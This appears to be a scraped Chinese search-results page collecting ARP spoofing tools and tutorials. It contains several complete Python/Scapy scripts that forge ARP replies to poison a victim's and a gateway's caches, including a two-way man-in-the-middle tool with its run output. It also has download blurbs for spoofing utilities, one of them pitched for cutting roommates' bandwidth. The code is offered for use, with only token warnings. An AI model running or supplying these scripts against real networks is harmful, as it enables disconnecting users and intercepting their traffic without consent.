精华内容
下载资源
问答
  • ARP欺骗工具

    2018-07-31 19:42:18
    ARP欺骗工具,用于ARP欺骗练习时使用,不得用作其他用途
  • mars-arp欺骗工具

    2014-12-08 11:53:21
    mars-arp是一款经典的arp欺骗工具,工具实用性很强!
  • arp欺骗工具.rar

    2012-10-28 11:35:14
    arp欺骗工具.rar
  • ARP欺骗工具.rar

    2010-09-13 15:56:47
    ARP欺骗工具.rarARP欺骗工具.rarARP欺骗工具.rarARP欺骗工具.rar
  • arp欺骗工具有源代码

    2014-04-22 21:28:41
    arp欺骗工具有源代码,c#调试成功,非常实用
  • 实验三 ARP 欺骗工具及原理分析 一实验目的 熟悉 ARP 欺骗攻击工具的使用 熟悉 ARP 欺骗防范工具的使用 熟悉 ARP 欺骗攻击的原理 二实验准备 要求实验室内网络是连通的组内每台计算机均可以访问另外一台计算机 下载...
  • arp欺骗工具arpspoof.pdf

    2019-06-18 14:57:29
    arp断网工具,学会使用即可进行arp欺骗,新手入门学习文档。
  • 前面给大家做一些扫描工具,今天小菜给大家带来了ARP欺骗工具。当然啦,工具实现起来也是几行代码呢!(是不是依旧如此简单)。这个可以让目标器断网,还可以把数据包转到自己机器上,自己机器开启转发数据包功能,这样...

    前面给大家做一些扫描工具,今天小菜给大家带来了ARP欺骗工具。当然啦,工具实现起来也是几行代码呢!(是不是依旧如此简单)。这个可以让目标器断网,还可以把数据包转到自己机器上,自己机器开启转发数据包功能,这样就可以嗅探目标器的数据喽。大家不要那这个干坏事儿呢!!!图1是运行截图,当然啦网卡信息可以自己去掉!我用抓包工具抓到了自己手机请求的数据包呢。

    0656217ff920e5d4ae20f35ba87b5199.png

    图1

    0x01 ARP欺骗原理(这个还是需要普及一下,大神跳过)

    ARP欺骗的运作原理是由攻击者发送假的ARP数据包到网上,尤其是送到网关上。其目的是要让送至特定的IP地址的流量被错误送到攻击者所取代的地方。因此攻击者可将这些流量另行转送到真正的网关(被动式数据包嗅探,passive sniffing)或是篡改后再转送(中间人攻击,man-in-the-middle attack)。攻击者亦可将ARP数据包导到不存在的MAC地址以达到阻断服务攻击的效果,例如netcut软件。

    0x02 工欲善其事必先利其器(当然啦,肯定要准备工具呢)

    1. python环境(这个就不用多说啦)。
    2. scapy(这次还用它,安装命令:pip install scapy),这个库封装了好多复杂的东西,咱们直接用就行。
    3. 还是提醒一句windows上用的话记得装上Npcap
    4. 如果想要监听受害者的数据包,记得把本机的数据包转发功能打开。
    windows: 服务 ==> 启用 Routing and Remote Access 服务linux: 将文件/etc/sysctl.conf里面的net.ipv4.ip_forward=1的注释去除执行命令sysctl -p

    0x04 ARP欺骗步骤(可跳过直接看代码)

    假设在一个局域网里,只有三台主机A、B、C,且C是攻击者。

    1. 攻击者聆听局域网上的MAC地址。它只要收到两台主机洪泛的ARP Request,就可以进行欺骗活动。
    2. 主机A、B都洪泛了ARP Request.攻击者现在有了两台主机的IP、MAC地址,开始攻击
    3. 攻击者发送一个ARP Reply给主机B,把此包protocol header里的sender IP设为A的IP地址,sender mac设为攻击者自己的MAC地址。
    4. 主机B收到ARP Reply后,更新它的ARP表,把主机A的MAC地址(IP_A, MAC_A)改为(IP_A, MAC_C)。
    5. 当主机B要发送数据包给主机A时,它根据ARP表来封装数据包的Link报头,把目的MAC地址设为MAC_C,而非MAC_A。
    6. 当交换机收到B发送给A的数据包时,根据此包的目的MAC地址(MAC_C)而把数据包转发给攻击者C。
    7. 攻击者收到数据包后,可以把它存起来后再发送给A,达到偷听效果。攻击者也可以篡改数据后才发送数据包给A,造成伤害。

    0x05 编写代码逻辑

    这次还是给大家截图,显示的格式看起来舒服。如图2

    c7b00468d1d15ae06deda423eb59c14b.png

    图2

    0x06 运行

    代码不多,运行如图1,没有什么需要显示的,所以小菜把自己的名字挂了上去。停止的话直接ctrl+c即可。再次告诉大家 不要做坏事儿噢!!!

    展开全文
  • ARP欺骗工具 0.5.3汉化破解版,可以将人T出局域网哦!
  • arp欺骗工具。rar

    2011-03-19 11:41:52
    arp欺骗arp欺骗arp欺骗arp欺骗
  • arp欺骗工具源码 zxarps完整源码,有码有真相
  • Mac下的arp欺骗攻击工具,debookee无病毒很好用,欢迎下载哟
  • 刚学习了scapy模块的一些用法,非常强大,为了练手,利用此模块编写了一个arp欺骗工具,其核心是构造arp欺骗包。加了一个-a参数用于进行全网欺骗,先暂不实现。代码如下: 1 #--*--coding=utf-8--*-- 2 3 ...

      刚学习了scapy模块的一些用法,非常强大,为了练手,利用此模块编写了一个arp欺骗工具,其核心是构造arp欺骗包。加了一个-a参数用于进行全网欺骗,先暂不实现。代码如下:

     1 #--*--coding=utf-8--*--
     2 
     3 from scapy.all import *
     4 import optparse
     5 import threading
     6 
     7 #解决在linux系统上运行时报的unicode编码相关错误
     8 import sys
     9 reload(sys)
    10 sys.setdefaultencoding('utf-8')
    11 
    12 
    13 def getMac(tgtIP):
    14     '''
    15     调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。
    16     '''
    17     try:
    18         tgtMac = getmacbyip(tgtIP)
    19         return tgtMac
    20     except:
    21         print '[-]请检查目标IP是否存活' 
    22 
    23 def createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP):
    24     '''
    25     生成ARP数据包,伪造网关欺骗目标计算机
    26     srcMac:本机的MAC地址,充当中间人
    27     tgtMac:目标计算机的MAC
    28     gatewayIP:网关的IP,将发往网关的数据指向本机(中间人),形成ARP攻击
    29     tgtIP:目标计算机的IP
    30     op=2,表示ARP响应
    31     '''
    32     pkt = Ether(src=srcMac,dst=tgtMac)/ARP(hwsrc=srcMac,psrc=gatewayIP,hwdst=tgtMac,pdst=tgtIP,op=2)
    33     return pkt
    34 
    35 def createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP):
    36     '''
    37     生成ARP数据包,伪造目标计算机欺骗网关
    38     srcMac:本机的MAC地址,充当中间人
    39     gatewayMac:网关的MAC
    40     tgtIP:目标计算机的IP,将网关发往目标计算机的数据指向本机(中间人),形成ARP攻击
    41     gatewayIP:网关的IP
    42     op=2,表示ARP响应
    43     '''
    44     pkt = Ether(src=srcMac,dst=gatewayMac)/ARP(hwsrc=srcMac,psrc=tgtIP,hwdst=gatewayMac,pdst=gatewayIP,op=2)
    45     return pkt
    46 
    47 
    48 def main():
    49     usage = 'Usage: %prog -t <targetip> -g <gatewayip> -i <interface> -a'
    50     parser = optparse.OptionParser(usage,version='v1.0')
    51     parser.add_option('-t',dest='targetIP',type='string',help='指定目标计算机IP')
    52     parser.add_option('-g',dest='gatewayIP',type='string',help='指定网关IP')
    53     parser.add_option('-i',dest='interface',type='string',help='指定使用的网卡')
    54     parser.add_option('-a',dest='allarp',action='store_true',help='是否进行全网arp欺骗')
    55     
    56     options,args = parser.parse_args()
    57     tgtIP = options.targetIP
    58     gatewayIP = options.gatewayIP
    59     interface = options.interface
    60   
    61     if tgtIP == None or gatewayIP == None or interface == None:
    62         print parser.print_help()
    63         exit(0)
    64     
    65     srcMac = get_if_hwaddr(interface)
    66     print '本机MAC地址是:',srcMac
    67     tgtMac = getMac(tgtIP)
    68     print '目标计算机MAC地址是:',tgtMac
    69     gatewayMac = getMac(gatewayIP)
    70     print '网关MAC地址是:',gatewayMac
    71     raw_input('按任意键继续:')
    72 
    73 
    74     pktstation = createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP)
    75     pktgateway = createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP)
    76 
    77    
    78     i = 1
    79     while True:
    80         t = threading.Thread(target=sendp,args=(pktstation,),kwargs={'iface':interface})
    81         t.start()
    82         t.join()
    83         print str(i) + ' [*]发送一个计算机ARP欺骗包'
    84        
    85         s = threading.Thread(target=sendp,args=(pktgateway,),kwargs={'iface':interface,})
    86         s.start()
    87         s.join()
    88         print str(i) + ' [*]发送一个网关ARP欺骗包'
    89         i += 1       
    90         
    91             
    92 
    93 if __name__ == '__main__':
    94     main()

    验证如下:

     1 # python arpspoof.py -t 192.168.1.28 -g 192.168.1.1 -i wlan0
     2 WARNING: No route found for IPv6 destination :: (no default route?)
     3 本机MAC地址是: xxx
     4 目标计算机MAC地址是:xxx
     5 网关MAC地址是: xxx
     6 按任意键继续:
     7 .
     8 Sent 1 packets.
     9 1 [*]发送一个计算机ARP欺骗包
    10 .
    11 Sent 1 packets.
    12 1 [*]发送一个网关ARP欺骗包
    13 .
    14 Sent 1 packets.
    15 2 [*]发送一个计算机ARP欺骗包
    16 .
    17 Sent 1 packets.
    18 2 [*]发送一个网关ARP欺骗包
    19 .
    20 Sent 1 packets.
    21 3 [*]发送一个计算机ARP欺骗包
    22 .
    23 Sent 1 packets.
    24 3 [*]发送一个网关ARP欺骗包
    25 ......

    #driftnet -i wlan0

     

    转载于:https://www.cnblogs.com/darkpig/p/5866077.html

    展开全文
  • ARP欺骗工具和IP存活测试工具

    千次阅读 2011-12-07 01:24:56
    最近有同学反映到,有些舍友很不自觉,经常看PPS或者下载东西,还不限速的,严重影响了正常用户的正常访问。...1,第一个,ARP欺骗工具: 下载地址:http://www.52harry.com/download/dl_wlaq/2011
     
    

    最近有同学反映到,有些舍友很不自觉,经常看PPS或者下载东西,还不限速的,严重影响了正常用户的正常访问。本来推荐给同学几款不错的局域网限速工具,但是好像因为硬盘不支持,无法运行。所以决定写一个工具给大家用用,经本人测试,效果还是不错的。希望能帮的上大家的忙。

    1,第一个,ARP欺骗工具:

    下载地址:http://www.52harry.com/download/dl_wlaq/2011-12-07/142.html

    该软件可以实现局域网内的IP简单欺骗
    执行的时候需要5个参数
    执行格式如:./arp_attack eth1 192.169.1.1 192.168.1.100 20 20
    第一个参数:表示本机的网络接口名称
    第二个参数:局域网的网关,通常是路由器的IP
    第三个参数:需要攻击的主机的IP地址
    第四个参数:表示每隔多少时间开始进行ARP欺骗攻击(单位秒)
    第五个参数:表示每次进行ARP攻击的持续时间(单位秒)

    2,第二个,IP存活测试工具

    下载地址:http://www.52harry.com/download/dl_wlaq/2011-12-07/143.html

    本软件是nmap封装的一个程序,主要是为了获取主机的信息,包括主机的IP,主板,操作系统,端口,服务。还是很不错的。
    但是这个版本只提供IP存在的探测。主要是为了配合arp欺骗工具使用的。
    可以先用该软件探测出局域网存在哪些IP,然后用对其进行ARP欺骗测试。
    如需使用,必须先安装nmap
    安装nmap方法:sudo apt-get install nmap 即可

    然后运行本程序,格式如下:./getmsg 192.168.1.1 192.168.1.100
    第一个参数为:起始IP
    第二个参数为:终止IP

    做的不好的地方希望大家不吝赐教!

    展开全文
  • 用一张图简单介绍一下ARP的攻击原理: 这时候,受害者的流量全部经过攻击者机,卖家发给受害者的流量也会经过攻击者机的手上。从而让受害者无法与网关联系,导致流量无法到达受害者机上。而攻击者却能拿到网段...

    本文将用Python中的Scapy模块编写。

    用一张图简单介绍一下ARP的攻击原理:

    这时候,受害者的流量全部经过攻击者机,卖家发给受害者的流量也会经过攻击者机的手上。从而让受害者无法与网关联系,导致流量无法到达受害者机上。而攻击者却能拿到网段所有流量。

    ARP数据的详细信息列表:

    参数

    注释

    Hardware type

    硬件类型,标识链路层协议

    Protocol type

    协议类型,标识网络层协议

    Hardware size

    硬件地址大小,标识MAC地址长度,这里是6个字节(48bit)

    Protocol size

    协议地址大小,标识IP地址长度,这里是4个字节(32bit)

    Opcode

    操作代码,标识ARP数据包类型,1表示请求,2表示回应

    Sender MAC address

    发送者MAC

    Sender IP address

    发送者IP

    Target MAC address

    目标MAC,此处全0表示在请求

    Target IP address

    目标IP

    第一种写法

    这一种写法可以直接调用scapy模块,然后实例化ARP类赋值给arp,然后直接设置源地址和目的地址,如果不设置源Mac地址和目的Mac地址那么默认就是攻击者的Mac地址。

    然后来个死循环不断去发包。

    如果不会ARP,可以看下这个图。

    from scapy.all import *
    
    arp = ARP()
    
    arp.psrc = "192.168.1.1"
    
    arp.pdst = "192.168.1.103"
    
    while True:
        send(arp)

    还没攻击之前,网关对应的IP地址是正确的。

    当我们运行脚本,不断的去发ARP包,不断冲刷ARP缓冲表后

    网关的IP地址对应的MAC地址发生了变化,网关地址变成了攻击机 Kali Linux的MAC地址。

    此时的受害者机已经无法上网了

    第二种写法

    第一种写法,我们是以网关的身份发送ARP包给192.168.1.103这个用户,改掉了MAC地址。

    第二种写法,可以调用kamene模块,这个模块和scapy模块一样,为什么不用scapy模块?请看 Python的Scapy模块的一个坑 这篇文章。

    f

    from kamene.all import (
        Ether,
        ARP,
        sendp
    )
    
    eth = Ether()
    
    arp = ARP(
        op = 'is-at',
    
        hwsrc = "54:27:1E:A2:F4:85",
    
        psrc = "192.168.1.1",
    
        hwdst = "00:0c:29:70:43:e9",
    
        pdst = "192.168.1.106"
    
    )
    
    print((eth / arp).show())
    
    sendp(eth / arp,inter = 2, loop = 1)

    先调用kamene模块,导入这个模块中的Ether ARP sendp方法。

    然后实例化Ether方法,再实例化ARP方法,并且配置其参数。

    然后重载"/"操作符,可以用来表示两个协议层的组合,显示其数据包的结构信息。

    再使用sendp方法进行发包,每1秒重复发包,这种方法可能会导致本机也上不了网,因为导致了网络拥堵。

    第三种方法

    from scapy.all import (
        ARP,
        Ether,
        sendp
    )
    
    eth = Ether()
    
    arp = ARP(
        op = "is-at",
        hwsrc = "ff:ff:ff:ff:ff:ff",
        psrc = "192.168.1.106",
        pdst = "192.168.1.101"
    )
    
    print((eth/arp).show())
    
    while True:
        sendp(eth/arp,inter=2,loop=1)

    这种方法,我们可以直接以攻击者和客户之间的欺骗,这种方法并没有欺骗用户网关的MAC地址,而是欺骗了我攻击者的MAC地址。

    也就是得出了一个结论,我们既可以通过网关的身份去欺骗用户,也可以通过客户与客户之间的欺骗。如果不写欺骗的MAC地址,那么默认就是攻击者的MAC地址。

    展开全文
  • winpcap+vc开发arp欺骗工具

    热门讨论 2011-03-06 18:21:59
    vc+winpcap开发包编写的一个arp欺骗程序,可在交换环境下对单个或者多个攻击目标进行欺骗。 A tool developped by vc and winpcap.This tool can attack other machines of same switch network by arp spoofing
  • 环境 vs2010 pcap库,2015毕业设计,只有源码,文档评论向我索要 解压密码 :20150818arp
  • arp扫描仪实用程序隐藏您的计算机(ip / MAC)。 列出您局域网中的所有活动主机。 切断任何活动主机与网关之间的连接。 使用wondershaper来控制您的上传或下载速度限制。 截屏 6.1 安装 从部分获取软件包 从...
  • arpspoof是一个好用的ARP欺骗工具,Kali linux中自带了该工具,但是在ubuntu中,默认是没有这个工具的,那么安装它就只需运行命令: sudo apt-get install dsniff 安装完成后,输入命令:arpspoof --help可以查看...
  • 网上看到的一篇介绍ARP工具编程的,虽然比较老了,但是有很好的参考价值,ARP的原理与详细的代码实现,切莫去做坏事

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 8,448
精华内容 3,379
关键字:

arp欺骗工具